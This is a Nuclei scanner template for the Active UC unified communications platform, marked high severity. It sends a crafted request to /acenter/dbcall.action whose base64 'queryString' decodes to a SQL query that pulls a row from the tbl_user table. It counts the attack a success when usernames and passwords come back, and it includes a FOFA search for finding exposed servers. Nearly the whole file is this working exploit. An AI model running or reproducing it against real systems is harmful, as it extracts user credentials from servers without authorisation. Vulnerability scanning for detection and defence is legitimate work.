id: active-uc-dbcall-disclosure
info:
  name: 网动统一通信平台 dbcall.action存在信息泄露
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://vip.bdziyi.com/59489/
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: title="网动统一通信平台(Active UC)" || (body="top.action?params=index" && body="preLog.action")
    tips:
    repair:
    version:
  tags: active-uc,disclosure

http:
  - raw:
      - |
        GET /acenter/dbcall.action?cmdid=10018&verify_userid=dasd&verify_password=&verify_username=&verify_password_enc=&queryString=U0VMRUNUKkZST00vKiovdGJsX3VzZXIvKiovTElNSVQvKiovMCwx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.795.76 Safari/537.36
        Accept: */*
        Connection: close
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'USERNAME','PASSWORD','NICKNAME')
          - contains_all(header,'text/plain')
        condition: and